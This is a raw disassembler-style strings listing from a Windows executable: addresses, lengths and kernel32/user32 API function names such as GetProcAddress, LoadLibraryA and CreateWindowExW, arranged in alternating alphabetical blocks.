.text:00420728 0000000A C PurgeComm

.text:00420734 0000000B C PulseEvent

.text:00420740 0000000E C Process32Next

.text:00420750 0000000F C Process32First

.text:00420760 0000000C C PrepareTape

.text:0042076C 0000001B C PostQueuedCompletionStatus

.text:00420788 0000000E C PeekNamedPipe

.text:00420798 00000012 C PeekConsoleInputW

.text:004207AC 00000012 C PeekConsoleInputA

.text:004207C0 00000013 C OutputDebugStringW

.text:004207D4 00000013 C OutputDebugStringA

.text:004207E8 00000013 C OpenWaitableTimerW

.text:004207FC 00000013 C OpenWaitableTimerA

.text:00420810 0000000F C OpenSemaphoreW

.text:00420820 0000000F C OpenSemaphoreA

.text:00420830 0000000C C OpenProcess

.text:0042083C 0000000B C OpenMutexW

.text:00420848 0000000B C OpenMutexA

.text:00420854 00000011 C OpenFileMappingW

.text:00420868 00000011 C OpenFileMappingA

.text:0042087C 00000009 C OpenFile

.text:00420888 0000000B C OpenEventW

.text:00420894 0000000B C OpenEventA

.text:004208A0 00000014 C MultiByteToWideChar

.text:004208B4 00000007 C MulDiv

.text:004208BC 0000000A C MoveFileW

.text:004208C8 0000000C C MoveFileExW

.text:004208D4 0000000C C MoveFileExA

.text:004208E0 0000000A C MoveFileA

.text:004208EC 0000000D C Module32Next

.text:004208FC 0000000E C Module32First

.text:0042090C 00000010 C MapViewOfFileEx

.text:0042091C 0000000E C MapViewOfFile

.text:0042092C 0000000D C LockResource

.text:0042093C 0000000B C LockFileEx

.text:00420948 00000009 C LockFile

.text:00420954 0000000C C LocalUnlock

.text:00420960 0000000A C LocalSize

.text:0042096C 0000000C C LocalShrink

.text:00420978 0000000D C LocalReAlloc

.text:00420988 0000000A C LocalLock

.text:00420994 0000000C C LocalHandle

.text:004209A0 0000000A C LocalFree

.text:004209AC 0000000B C LocalFlags

.text:004209B8 00000018 C LocalFileTimeToFileTime

.text:004209D0 0000000D C LocalCompact

.text:004209E0 0000000B C LocalAlloc

.text:004209EC 0000000D C LoadResource

.text:004209FC 0000000B C LoadModule

.text:00420A08 0000000D C LoadLibraryW

.text:00420A18 0000000F C LoadLibraryExW

.text:00420A28 0000000F C LoadLibraryExA

.text:00420A38 0000000D C LoadLibraryA

.text:0041B440 0000000C C LoadCursorW

.text:0041B44C 00000014 C LoadCursorFromFileW

.text:0041B460 00000014 C LoadCursorFromFileA

.text:0041B474 0000000C C LoadCursorA

.text:0041B480 0000000C C LoadBitmapW

.text:0041B48C 0000000C C LoadBitmapA

.text:0041B498 00000012 C LoadAcceleratorsW

.text:0041B4AC 00000012 C LoadAcceleratorsA

.text:0041B4C0 0000000A C KillTimer

.text:0041B4CC 00000009 C IsZoomed

.text:0041B4D8 00000010 C IsWindowVisible

.text:0041B4E8 00000010 C IsWindowUnicode

.text:0041B4F8 00000010 C IsWindowEnabled

.text:0041B508 00000009 C IsWindow

.text:0041B514 0000000C C IsRectEmpty

.text:0041B520 00000007 C IsMenu

.text:0041B528 00000009 C IsIconic

.text:0041B534 00000013 C IsDlgButtonChecked

.text:0041B548 00000011 C IsDialogMessageW

.text:0041B55C 00000011 C IsDialogMessageA

.text:0041B570 00000010 C IsDialogMessage

.text:0041B580 0000001B C IsClipboardFormatAvailable

.text:0041B59C 00000008 C IsChild

.text:0041B5A4 0000000D C IsCharUpperW

.text:0041B5B4 0000000D C IsCharUpperA

.text:0041B5C4 0000000D C IsCharLowerW

.text:0041B5D4 0000000D C IsCharLowerA

.text:0041B5E4 0000000D C IsCharAlphaW

.text:0041B5F4 00000014 C IsCharAlphaNumericW

.text:0041B608 00000014 C IsCharAlphaNumericA

.text:0041B61C 0000000D C IsCharAlphaA

.text:0041B62C 0000000B C InvertRect

.text:0041B638 0000000E C InvalidateRgn

.text:0041B648 0000000F C InvalidateRect

.text:0041B658 0000000E C IntersectRect

.text:0041B668 00000016 C InternalGetWindowText

.text:0041B680 0000000C C InsertMenuW

.text:0041B68C 00000010 C InsertMenuItemW

.text:0041B69C 00000010 C InsertMenuItemA

.text:0041B6AC 0000000C C InsertMenuA

.text:0041B6B8 0000000C C InflateRect

.text:0041B6C4 00000010 C InSendMessageEx

.text:0041B6D4 0000000E C InSendMessage

.text:0041B6E4 0000001B C ImpersonateDdeClientWindow

.text:0041B700 0000000F C HiliteMenuItem

.text:0041B710 0000000A C HideCaret

.text:0041B71C 0000000C C GrayStringW

.text:0041B728 0000000C C GrayStringA

.text:0041B734 0000000E C GetWindowWord

.text:0041B744 00000019 C GetWindowThreadProcessId

.text:0041B760 0000000F C GetWindowTextW

.text:0041B770 00000015 C GetWindowTextLengthW

.text:0041B788 00000015 C GetWindowTextLengthA

.text:0041B7A0 0000000F C GetWindowTextA

.text:0041B7B0 0000000D C GetWindowRgn

.text:0041B7C0 0000000E C GetWindowRect

.text:0041B7D0 00000013 C GetWindowPlacement

.text:0041B7E4 00000019 C GetWindowModuleFileNameW

.text:0041B800 00000019 C GetWindowModuleFileNameA

.text:0041B81C 0000000F C GetWindowLongW

.text:0041B82C 0000000F C GetWindowLongA

.text:0041B83C 0000000E C GetWindowInfo

.text:0041B84C 0000000C C GetWindowDC

.text:0041B858 00000017 C GetWindowContextHelpId

.text:0041B870 0000000A C GetWindow

.text:0041B87C 00000016 C GetUserObjectSecurity

.text:0041B894 0000001A C GetUserObjectInformationW

.text:0041B8B0 0000001A C GetUserObjectInformationA

.text:0041B8CC 0000000D C GetUpdateRgn

.text:0041B8DC 0000000E C GetUpdateRect

.text:00420A48 0000000D C LCMapStringW

.text:00420A58 0000000D C LCMapStringA

.text:00420A68 0000000E C IsValidLocale

.text:00420A78 00000010 C IsValidCodePage

.text:00420A88 00000018 C IsSystemResumeAutomatic

.text:00420AA0 0000001A C IsProcessorFeaturePresent

.text:00420ABC 00000012 C IsDebuggerPresent

.text:00420AD0 00000011 C IsDBCSLeadByteEx

.text:00420AE4 0000000F C IsDBCSLeadByte

.text:00420AF4 0000000E C IsBadWritePtr

.text:00420B04 00000010 C IsBadStringPtrW

.text:00420B14 00000010 C IsBadStringPtrA

.text:00420B24 0000000D C IsBadReadPtr

.text:00420B34 00000012 C IsBadHugeWritePtr

.text:00420B48 00000011 C IsBadHugeReadPtr

.text:00420B5C 0000000D C IsBadCodePtr

.text:00420B6C 00000026 C InitializeCriticalSectionAndSpinCount

.text:00420B94 0000000E C InitAtomTable

.text:00420BA4 00000009 C HeapWalk

.text:00420BB0 0000000D C HeapValidate

.text:00420BC0 0000000B C HeapUnlock

.text:00420BCC 00000009 C HeapLock

.text:00420BD8 00000009 C HeapFree

.text:00420BE4 0000000C C HeapDestroy

.text:00420BF0 0000000B C HeapCreate

.text:00420BFC 0000000C C HeapCompact

.text:00420C09 0000000A C eap32Next

.text:00420C14 0000000F C Heap32ListNext

.text:00420C24 00000010 C Heap32ListFirst

.text:00420C34 0000000C C Heap32First

.text:00420C40 0000000B C GlobalWire

.text:00420C4C 0000000D C GlobalUnlock

.text:00420C5C 0000000C C GlobalUnfix

.text:00420C68 0000000D C GlobalUnWire

.text:00420C79 0000000A C lobalSize

.text:00420C84 0000000E C GlobalReAlloc

.text:00420C94 00000013 C GlobalMemoryStatus

.text:00420CA8 0000000B C GlobalLock

.text:00420CB4 0000000D C GlobalHandle

.text:00420CC4 00000013 C GlobalGetAtomNameW

.text:00420CD8 00000013 C GlobalGetAtomNameA

.text:00420CED 0000000A C lobalFree

.text:00420CF8 0000000C C GlobalFlags

.text:00420D04 0000000A C GlobalFix

.text:00420D10 00000010 C GlobalFindAtomW

.text:00420D20 00000010 C GlobalFindAtomA

.text:00420D30 00000011 C GlobalDeleteAtom

.text:00420D44 0000000E C GlobalCompact

.text:00420D54 0000000C C GlobalAlloc

.text:00420D61 0000000E C lobalAddAtomW

.text:00420D70 0000000F C GlobalAddAtomA

.text:00420D80 0000000E C GetWriteWatch

.text:00420D90 00000015 C GetWindowsDirectoryW

.text:00420DA8 00000015 C GetWindowsDirectoryA

.text:00420DC0 00000016 C GetVolumeInformationW

.text:00420DD8 00000016 C GetVolumeInformationA

.text:00420DF0 0000000E C GetVersionExW

.text:00420E00 0000000E C GetVersionExA

.text:00420E10 0000000B C GetVersion

.text:00420E1C 00000015 C GetUserDefaultLangID

.text:00420E34 00000013 C GetUserDefaultLCID

.text:00420E48 00000017 C GetTimeZoneInformation

.text:00420E60 0000000F C GetTimeFormatW

.text:00420E70 0000000F C GetTimeFormatA

.text:00420E80 0000000D C GetTickCount

.text:00420E90 0000000F C GetThreadTimes

.text:00420EA0 00000017 C GetThreadSelectorEntry

.text:00420EB8 00000017 C GetThreadPriorityBoost

.text:00420ED0 00000012 C GetThreadPriority

.text:00420EE4 00000010 C GetThreadLocale

.text:0041B8EC 0000000D C GetTopWindow

.text:0041B8FC 00000010 C GetTitleBarInfo

.text:0041B90C 00000011 C GetThreadDesktop

.text:0041B920 00000015 C GetTabbedTextExtentW

.text:0041B938 00000015 C GetTabbedTextExtentA

.text:0041B950 00000011 C GetSystemMetrics

.text:0041B964 0000000E C GetSystemMenu

.text:0041B974 00000011 C GetSysColorBrush

.text:0041B988 0000000C C GetSysColor

.text:0041B994 0000000B C GetSubMenu

.text:0041B9A0 0000000F C GetShellWindow

.text:0041B9B0 0000000F C GetScrollRange

.text:0041B9C0 0000000D C GetScrollPos

.text:0041B9D0 0000000E C GetScrollInfo

.text:0041B9E0 00000011 C GetScrollBarInfo

.text:0041B9F4 0000000F C GetQueueStatus

.text:0041BA04 00000009 C GetPropW

.text:0041BA10 00000009 C GetPropA

.text:0041BA1C 00000018 C GetProcessWindowStation

.text:0041BA34 00000018 C GetProcessDefaultLayout

.text:0041BA4C 0000001B C GetPriorityClipboardFormat

.text:0041BA68 0000000A C GetParent

.text:0041BA74 00000017 C GetOpenClipboardWindow

.text:0041BA8C 00000012 C GetNextDlgTabItem

.text:0041BAA0 00000014 C GetNextDlgGroupItem

.text:0041BAB4 00000010 C GetMonitorInfoW

.text:0041BAC4 00000010 C GetMonitorInfoA

.text:0041BAD4 0000000C C GetMessageW

.text:0041BAE0 0000000F C GetMessageTime

.text:0041BAF0 0000000E C GetMessagePos

.text:0041BB00 00000014 C GetMessageExtraInfo

.text:0041BB14 0000000C C GetMessageA

.text:0041BB20 0000000F C GetMenuStringW

.text:0041BB30 0000000F C GetMenuStringA

.text:0041BB40 0000000D C GetMenuState

.text:0041BB50 00000010 C GetMenuItemRect

.text:0041BB60 00000011 C GetMenuItemInfoW

.text:0041BB74 00000011 C GetMenuItemInfoA

.text:0041BB88 0000000E C GetMenuItemID

.text:0041BB98 00000011 C GetMenuItemCount

.text:0041BBAC 0000000C C GetMenuInfo

.text:0041BBB8 00000013 C GetMenuDefaultItem

.text:0041BBCC 00000015 C GetMenuContextHelpId

.text:0041BBE4 0000001B C GetMenuCheckMarkDimensions

.text:0041BC00 0000000F C GetMenuBarInfo

.text:0041BC10 00000008 C GetMenu

.text:0041BC18 0000000F C GetListBoxInfo

.text:0041BC28 00000013 C GetLastActivePopup

.text:0041BC3C 00000010 C GetKeyboardType

.text:0041BC4C 00000011 C GetKeyboardState

.text:0041BC60 00000017 C GetKeyboardLayoutNameW

.text:0041BC78 00000017 C GetKeyboardLayoutNameA

.text:0041BC90 00000016 C GetKeyboardLayoutList

.text:0041BCA8 00000012 C GetKeyboardLayout

.text:0041BCBC 0000000C C GetKeyState

.text:0041BCC8 00000010 C GetKeyNameTextW

.text:0041BCD8 00000010 C GetKeyNameTextA

.text:0041BCE8 0000000E C GetKBCodePage

.text:0041BCF8 0000000E C GetInputState

.text:0041BD08 00000010 C GetInputDesktop

.text:0041BD18 0000000C C GetIconInfo

.text:0041BD24 00000010 C GetGuiResources

.text:0041BD34 00000011 C GetGUIThreadInfo

.text:0041BD48 00000014 C GetForegroundWindow

.text:0041BD5C 00000009 C GetFocus

.text:0041BD68 00000013 C GetDoubleClickTime

.text:0041BD7C 00000010 C GetDlgItemTextW

.text:0041BD8C 00000010 C GetDlgItemTextA

.text:0041BD9C 0000000E C GetDlgItemInt

.text:0041BDAC 0000000B C GetDlgItem

.text:00420EF4 00000011 C GetThreadContext

.text:00420F08 0000000D C GetTempPathW

.text:00420F18 0000000D C GetTempPathA

.text:00420F28 00000011 C GetTempFileNameW

.text:00420F3C 00000011 C GetTempFileNameA

.text:00420F50 0000000E C GetTapeStatus

.text:00420F60 00000010 C GetTapePosition

.text:00420F70 00000012 C GetTapeParameters

.text:00420F84 00000018 C GetSystemTimeAsFileTime

.text:00420F9C 00000018 C GetSystemTimeAdjustment

.text:00420FB4 0000000E C GetSystemTime

.text:00420FC4 00000015 C GetSystemPowerStatus

.text:00420FDC 0000000E C GetSystemInfo

.text:00420FEC 00000014 C GetSystemDirectoryW

.text:00421000 00000014 C GetSystemDirectoryA

.text:00421014 00000017 C GetSystemDefaultLangID

.text:0042102C 00000015 C GetSystemDefaultLCID

.text:00421044 0000000F C GetStringTypeW

.text:00421054 00000011 C GetStringTypeExW

.text:00421068 00000011 C GetStringTypeExA

.text:0042107C 0000000F C GetStringTypeA

.text:0042108C 0000000D C GetStdHandle

.text:0042109C 00000010 C GetStartupInfoW

.text:004210AC 00000010 C GetStartupInfoA

.text:004210BC 00000012 C GetShortPathNameW

.text:004210D0 00000012 C GetShortPathNameA

.text:004210E4 0000001A C GetQueuedCompletionStatus

.text:00421100 00000012 C GetProfileStringW

.text:00421114 00000012 C GetProfileStringA

.text:00421128 00000013 C GetProfileSectionW

.text:0042113C 00000013 C GetProfileSectionA

.text:00421150 0000000F C GetProfileIntW

.text:00421160 0000000F C GetProfileIntA

.text:00421170 00000019 C GetProcessWorkingSetSize

.text:0042118C 00000012 C GetProcessVersion

.text:004211A0 00000010 C GetProcessTimes

.text:004211B0 0000001D C GetProcessShutdownParameters

.text:004211D0 00000018 C GetProcessPriorityBoost

.text:004211E8 00000010 C GetProcessHeaps

.text:004211F8 0000000F C GetProcessHeap

.text:00421208 00000017 C GetProcessAffinityMask

.text:00421220 0000000F C GetProcAddress

.text:00421230 00000019 C GetPrivateProfileStructW

.text:0042124C 00000019 C GetPrivateProfileStructA

.text:00421268 00000019 C GetPrivateProfileStringW

.text:00421284 00000019 C GetPrivateProfileStringA

.text:004212A0 0000001A C GetPrivateProfileSectionW

.text:004212BC 0000001F C GetPrivateProfileSectionNamesW

.text:004212DC 0000001F C GetPrivateProfileSectionNamesA

.text:004212FC 0000001A C GetPrivateProfileSectionA

.text:00421318 00000016 C GetPrivateProfileIntW

.text:00421330 00000016 C GetPrivateProfileIntA

.text:00421348 00000011 C GetPriorityClass

.text:0042135C 00000014 C GetOverlappedResult

.text:00421370 00000009 C GetOEMCP

.text:0042137C 0000001F C GetNumberOfConsoleMouseButtons

.text:0042139C 0000001E C GetNumberOfConsoleInputEvents

.text:004213BC 00000011 C GetNumberFormatW

.text:004213D0 00000011 C GetNumberFormatA

.text:004213E4 00000011 C GetNamedPipeInfo

.text:004213F8 00000019 C GetNamedPipeHandleStateW

.text:00421414 00000019 C GetNamedPipeHandleStateA

.text:00421430 00000011 C GetModuleHandleW

.text:00421444 00000011 C GetModuleHandleA

.text:00421458 00000013 C GetModuleFileNameW

.text:0042146C 00000013 C GetModuleFileNameA

.text:00421480 00000010 C GetMailslotInfo

.text:00421490 00000011 C GetLongPathNameW

.text:004214A4 00000011 C GetLongPathNameA

.text:004214B8 00000011 C GetLogicalDrives

.text:0041BDB8 0000000D C GetDlgCtrlID

.text:0041BDC8 00000013 C GetDialogBaseUnits

.text:0041BDDC 00000011 C GetDesktopWindow

.text:0041BDF0 00000008 C GetDCEx

.text:0041BDF8 00000006 C GetDC

.text:0041BE00 0000000D C GetCursorPos

.text:0041BE10 0000000E C GetCursorInfo

.text:0041BE20 0000000A C GetCursor

.text:0041BE2C 00000010 C GetComboBoxInfo

.text:0041BE3C 00000013 C GetClipboardViewer

.text:0041BE50 0000001B C GetClipboardSequenceNumber

.text:0041BE6C 00000012 C GetClipboardOwner

.text:0041BE80 00000018 C GetClipboardFormatNameW

.text:0041BE98 00000018 C GetClipboardFormatNameA

.text:0041BEB0 00000011 C GetClipboardData

.text:0041BEC4 0000000E C GetClipCursor

.text:0041BED4 0000000E C GetClientRect

.text:0041BEE4 0000000D C GetClassWord

.text:0041BEF4 0000000E C GetClassNameW

.text:0041BF04 0000000E C GetClassNameA

.text:0041BF14 0000000E C GetClassLongW

.text:0041BF24 0000000E C GetClassLongA

.text:0041BF34 0000000E C GetClassInfoW

.text:0041BF44 00000010 C GetClassInfoExW

.text:0041BF54 00000010 C GetClassInfoExA

.text:0041BF64 0000000E C GetClassInfoA

.text:0041BF74 0000000C C GetCaretPos

.text:0041BF80 00000012 C GetCaretBlinkTime

.text:0041BF94 0000000B C GetCapture

.text:0041BFA0 00000011 C GetAsyncKeyState

.text:0041BFB4 0000000C C GetAncestor

.text:0041BFC0 0000000E C GetAltTabInfo

.text:0041BFD0 00000010 C GetActiveWindow

.text:0041BFE0 0000000E C FreeDDElParam

.text:0041BFF0 0000000A C FrameRect

.text:0041BFFC 0000000E C FlashWindowEx

.text:0041C00C 0000000C C FlashWindow

.text:0041C018 0000000C C FindWindowW

.text:0041C024 0000000E C FindWindowExW

.text:0041C034 0000000E C FindWindowExA

.text:0041C044 0000000C C FindWindowA

.text:0041C050 00000009 C FillRect

.text:0041C05C 0000000E C ExitWindowsEx

.text:0041C06C 00000011 C ExcludeUpdateRgn

.text:0041C080 0000000A C EqualRect

.text:0041C08C 0000000C C EnumWindows

.text:0041C098 00000014 C EnumWindowStationsW

.text:0041C0AC 00000014 C EnumWindowStationsA

.text:0041C0C0 00000012 C EnumThreadWindows

.text:0041C0D4 0000000B C EnumPropsW

.text:0041C0E0 0000000D C EnumPropsExW

.text:0041C0F0 0000000D C EnumPropsExA

.text:0041C100 0000000B C EnumPropsA

.text:0041C10C 00000015 C EnumDisplaySettingsW

.text:0041C124 00000017 C EnumDisplaySettingsExW

.text:0041C13C 00000017 C EnumDisplaySettingsExA

.text:0041C154 00000015 C EnumDisplaySettingsA

.text:0041C16C 00000014 C EnumDisplayMonitors

.text:0041C180 00000014 C EnumDisplayDevicesW

.text:0041C194 00000014 C EnumDisplayDevicesA

.text:0041C1A8 0000000E C EnumDesktopsW

.text:0041C1B8 0000000E C EnumDesktopsA

.text:0041C1C8 00000013 C EnumDesktopWindows

.text:0041C1DC 00000015 C EnumClipboardFormats

.text:0041C1F4 00000011 C EnumChildWindows

.text:0041C208 00000008 C EndTask

.text:0041C210 00000009 C EndPaint

.text:0041C21C 00000008 C EndMenu

.text:0041C224 0000000A C EndDialog

.text:0041C230 00000012 C EndDeferWindowPos

.text:004214CC 00000018 C GetLogicalDriveStringsW

.text:004214E4 00000018 C GetLogicalDriveStringsA

.text:004214FC 0000000F C GetLocaleInfoW

.text:0042150C 0000000F C GetLocaleInfoA

.text:0042151C 0000000D C GetLocalTime

.text:0042152C 0000000D C GetLastError

.text:0042153C 0000001C C GetLargestConsoleWindowSize

.text:00421558 00000015 C GetHandleInformation

.text:00421570 00000011 C GetFullPathNameW

.text:00421584 00000011 C GetFullPathNameA

.text:00421598 0000000C C GetFileType

.text:004215A4 0000000C C GetFileTime

.text:004215B0 0000000C C GetFileSize

.text:004215BC 0000001B C GetFileInformationByHandle

.text:004215D8 00000013 C GetFileAttributesW

.text:004215EC 00000015 C GetFileAttributesExW

.text:00421604 00000015 C GetFileAttributesExA

.text:0042161C 00000013 C GetFileAttributesA

.text:00421630 00000012 C GetExitCodeThread

.text:00421644 00000013 C GetExitCodeProcess

.text:00421658 00000018 C GetEnvironmentVariableW

.text:00421670 00000018 C GetEnvironmentVariableA

.text:00421688 00000017 C GetEnvironmentStringsW

.text:004216A0 00000017 C GetEnvironmentStringsA

.text:004216B8 00000016 C GetEnvironmentStrings

.text:004216D0 0000000E C GetDriveTypeW

.text:004216E0 0000000E C GetDriveTypeA

.text:004216F0 00000012 C GetDiskFreeSpaceW

.text:00421704 00000014 C GetDiskFreeSpaceExW

.text:00421718 00000014 C GetDiskFreeSpaceExA

.text:0042172C 00000012 C GetDiskFreeSpaceA

.text:00421740 00000014 C GetDevicePowerState

.text:00421754 00000016 C GetDefaultCommConfigW

.text:0042176C 00000016 C GetDefaultCommConfigA

.text:00421784 0000000F C GetDateFormatW

.text:00421794 0000000F C GetDateFormatA

.text:004217A4 00000013 C GetCurrentThreadId

.text:004217B8 00000011 C GetCurrentThread

.text:004217CC 00000014 C GetCurrentProcessId

.text:004217E0 00000012 C GetCurrentProcess

.text:004217F4 00000015 C GetCurrentDirectoryW

.text:0042180C 00000015 C GetCurrentDirectoryA

.text:00421824 00000013 C GetCurrencyFormatW

.text:00421838 00000013 C GetCurrencyFormatA

.text:0042184C 00000011 C GetConsoleTitleW

.text:00421860 00000011 C GetConsoleTitleA

.text:00421874 0000001B C GetConsoleScreenBufferInfo

.text:00421890 00000013 C GetConsoleOutputCP

.text:004218A4 0000000F C GetConsoleMode

.text:004218B4 00000015 C GetConsoleCursorInfo

.text:004218CC 0000000D C GetConsoleCP

.text:004218DC 00000011 C GetComputerNameW

.text:004218F0 00000011 C GetComputerNameA

.text:00421904 00000017 C GetCompressedFileSizeW

.text:0042191C 00000017 C GetCompressedFileSizeA

.text:00421934 00000010 C GetCommandLineW

.text:00421944 00000010 C GetCommandLineA

.text:00421954 00000010 C GetCommTimeouts

.text:00421964 0000000D C GetCommState

.text:00421974 00000012 C GetCommProperties

.text:00421988 00000013 C GetCommModemStatus

.text:0042199C 0000000C C GetCommMask

.text:004219A8 0000000E C GetCommConfig

.text:004219B8 00000011 C GetCalendarInfoW

.text:004219CC 00000011 C GetCalendarInfoA

.text:004219E0 0000000D C GetCPInfoExW

.text:004219F0 0000000D C GetCPInfoExA

.text:00421A00 0000000A C GetCPInfo

.text:00421A0C 0000000F C GetBinaryTypeW

.text:00421A1C 0000000F C GetBinaryTypeA

.text:0041C244 0000000D C EnableWindow

.text:0041C254 00000010 C EnableScrollBar

.text:0041C264 0000000F C EnableMenuItem

.text:0041C274 0000000F C EmptyClipboard

.text:0041C284 0000000C C EditWndProc

.text:0041C290 0000000A C DrawTextW

.text:0041C29C 0000000C C DrawTextExW

.text:0041C2A8 0000000C C DrawTextExA

.text:0041C2B4 0000000A C DrawTextA

.text:0041C2C0 0000000B C DrawStateW

.text:0041C2CC 0000000B C DrawStateA

.text:0041C2D8 0000000C C DrawMenuBar

.text:0041C2E4 0000000B C DrawIconEx

.text:0041C2F0 00000009 C DrawIcon

.text:0041C2FC 00000011 C DrawFrameControl

.text:0041C310 0000000A C DrawFrame

.text:0041C31C 0000000E C DrawFocusRect

.text:0041C32C 00000009 C DrawEdge

.text:0041C338 0000000C C DrawCaption

.text:0041C344 00000012 C DrawAnimatedRects

.text:0041C358 0000000B C DragObject

.text:0041C364 0000000B C DragDetect

.text:0041C370 00000010 C DlgDirSelectExW

.text:0041C380 00000010 C DlgDirSelectExA

.text:0041C390 00000018 C DlgDirSelectComboBoxExW

.text:0041C3A8 00000018 C DlgDirSelectComboBoxExA

.text:0041C3C0 0000000C C DlgDirListW

.text:0041C3CC 00000014 C DlgDirListComboBoxW

.text:0041C3E0 00000014 C DlgDirListComboBoxA

.text:0041C3F4 0000000C C DlgDirListA

.text:0041C400 00000011 C DispatchMessageW

.text:0041C414 00000011 C DispatchMessageA

.text:0041C428 00000010 C DialogBoxParamW

.text:0041C438 00000010 C DialogBoxParamA

.text:0041C448 00000018 C DialogBoxIndirectParamW

.text:0041C460 00000018 C DialogBoxIndirectParamA

.text:0041C478 0000000E C DestroyWindow

.text:0041C488 0000000C C DestroyMenu

.text:0041C494 0000000C C DestroyIcon

.text:0041C4A0 0000000E C DestroyCursor

.text:0041C4B0 0000000D C DestroyCaret

.text:0041C4C0 00000018 C DestroyAcceleratorTable

.text:0041C4D8 0000000B C DeleteMenu

.text:0041C4E4 0000000F C DeferWindowPos

.text:0041C4F4 0000000F C DefWindowProcW

.text:0041C504 0000000F C DefWindowProcA

.text:0041C514 00000011 C DefMDIChildProcW

.text:0041C528 00000011 C DefMDIChildProcA

.text:0041C53C 0000000E C DefFrameProcW

.text:0041C54C 0000000E C DefFrameProcA

.text:0041C55C 0000000C C DefDlgProcW

.text:0041C568 0000000C C DefDlgProcA

.text:0041C574 00000010 C DdeUninitialize

.text:0041C584 00000010 C DdeUnaccessData

.text:0041C594 00000011 C DdeSetUserHandle

.text:0041C5A8 00000017 C DdeSetQualityOfService

.text:0041C5C0 0000000D C DdeReconnect

.text:0041C5D0 00000010 C DdeQueryStringW

.text:0041C5E0 00000010 C DdeQueryStringA

.text:0041C5F0 00000013 C DdeQueryNextServer

.text:0041C604 00000011 C DdeQueryConvInfo

.text:0041C618 0000000E C DdePostAdvise

.text:0041C628 0000000F C DdeNameService

.text:0041C638 00000014 C DdeKeepStringHandle

.text:0041C64C 0000000F C DdeInitializeW

.text:0041C65C 0000000F C DdeInitializeA

.text:0041C66C 00000015 C DdeImpersonateClient

.text:0041C684 00000010 C DdeGetLastError

.text:0041C694 0000000B C DdeGetData

.text:0041C6A0 00000014 C DdeFreeStringHandle

.text:00421A2C 0000000E C GetBinaryType

.text:00421A3C 0000000D C GetAtomNameW

.text:00421A4C 0000000D C GetAtomNameA

.text:00421A5C 00000007 C GetACP

.text:00421A64 00000019 C GenerateConsoleCtrlEvent

.text:00421A80 0000000D C FreeResource

.text:00421A90 00000019 C FreeLibraryAndExitThread

.text:00421AAC 0000000C C FreeLibrary

.text:00421AB8 00000018 C FreeEnvironmentStringsW

.text:00421AD0 00000018 C FreeEnvironmentStringsA

.text:00421AE8 0000000C C FreeConsole

.text:00421AF4 0000000F C FormatMessageW

.text:00421B04 0000000F C FormatMessageA

.text:00421B14 0000000C C FoldStringW

.text:00421B20 0000000C C FoldStringA

.text:00421B2C 00000010 C FlushViewOfFile

.text:00421B3C 00000016 C FlushInstructionCache

.text:00421B54 00000011 C FlushFileBuffers

.text:00421B68 00000018 C FlushConsoleInputBuffer

.text:00421B80 0000000E C FindResourceW

.text:00421B90 00000010 C FindResourceExW

.text:00421BA0 00000010 C FindResourceExA

.text:00421BB0 0000000E C FindResourceA

.text:00421BC0 0000000E C FindNextFileW

.text:00421BD0 0000000E C FindNextFileA

.text:00421BE0 0000001B C FindNextChangeNotification

.text:00421BFC 0000000F C FindFirstFileW

.text:00421C0C 00000011 C FindFirstFileExW

.text:00421C20 00000011 C FindFirstFileExA

.text:00421C34 0000000F C FindFirstFileA

.text:00421C44 0000001D C FindFirstChangeNotificationW

.text:00421C64 0000001D C FindFirstChangeNotificationA

.text:00421C84 0000001C C FindCloseChangeNotification

.text:00421CA0 0000000A C FindClose

.text:00421CAC 0000000A C FindAtomW

.text:00421CB8 0000000A C FindAtomA

.text:00421CC4 0000001C C FillConsoleOutputCharacterW

.text:00421CE0 0000001C C FillConsoleOutputCharacterA

.text:00421CFC 0000001B C FillConsoleOutputAttribute

.text:00421D18 00000015 C FileTimeToSystemTime

.text:00421D30 00000018 C FileTimeToLocalFileTime

.text:00421D48 00000016 C FileTimeToDosDateTime

.text:00421D60 0000000A C FatalExit

.text:00421D6C 0000000E C FatalAppExitW

.text:00421D7C 0000000E C FatalAppExitA

.text:00421D8C 0000001A C ExpandEnvironmentStringsW

.text:00421DA8 0000001A C ExpandEnvironmentStringsA

.text:00421DC4 0000000C C ExitProcess

.text:00421DD0 00000013 C EscapeCommFunction

.text:00421DE4 0000000A C EraseTape

.text:00421DF0 00000011 C EnumTimeFormatsW

.text:00421E04 00000011 C EnumTimeFormatsA

.text:00421E18 00000013 C EnumSystemLocalesW

.text:00421E2C 00000013 C EnumSystemLocalesA

.text:00421E40 00000015 C EnumSystemCodePagesW

.text:00421E58 00000015 C EnumSystemCodePagesA

.text:00421E70 00000013 C EnumResourceTypesW

.text:00421E84 00000013 C EnumResourceTypesA

.text:00421E98 00000013 C EnumResourceNamesW

.text:00421EAC 00000013 C EnumResourceNamesA

.text:00421EC0 00000017 C EnumResourceLanguagesW

.text:00421ED8 00000017 C EnumResourceLanguagesA

.text:00421EF0 00000011 C EnumDateFormatsW

.text:00421F04 00000013 C EnumDateFormatsExW

.text:00421F18 00000013 C EnumDateFormatsExA

.text:00421F2C 00000011 C EnumDateFormatsA

.text:00421F40 00000012 C EnumCalendarInfoW

.text:00421F54 00000014 C EnumCalendarInfoExW

.text:00421F68 00000014 C EnumCalendarInfoExA

.text:00421F7C 00000012 C EnumCalendarInfoA

.text:0041C6B4 00000012 C DdeFreeDataHandle

.text:0041C6C8 00000012 C DdeEnableCallback

.text:0041C6DC 00000012 C DdeDisconnectList

.text:0041C6F0 0000000E C DdeDisconnect

.text:0041C700 00000017 C DdeCreateStringHandleW

.text:0041C718 00000017 C DdeCreateStringHandleA

.text:0041C730 00000014 C DdeCreateDataHandle

.text:0041C744 0000000F C DdeConnectList

.text:0041C754 0000000B C DdeConnect

.text:0041C760 00000014 C DdeCmpStringHandles

.text:0041C774 00000015 C DdeClientTransaction

.text:0041C78C 0000000B C DdeAddData

.text:0041C798 0000000E C DdeAccessData

.text:0041C7A8 00000016 C DdeAbandonTransaction

.text:0041C7C0 00000015 C CreateWindowStationW

.text:0041C7D8 00000015 C CreateWindowStationA

.text:0041C7F0 00000010 C CreateWindowExW

.text:0041C800 00000010 C CreateWindowExA

.text:0041C810 00000010 C CreatePopupMenu

.text:0041C820 0000000B C CreateMenu

.text:0041C82C 00000011 C CreateMDIWindowW

.text:0041C840 00000011 C CreateMDIWindowA

.text:0041C854 00000013 C CreateIconIndirect

.text:0041C868 00000019 C CreateIconFromResourceEx

.text:0041C884 00000017 C CreateIconFromResource

.text:0041C89C 0000000B C CreateIcon

.text:0041C8A8 00000013 C CreateDialogParamW

.text:0041C8BC 00000013 C CreateDialogParamA

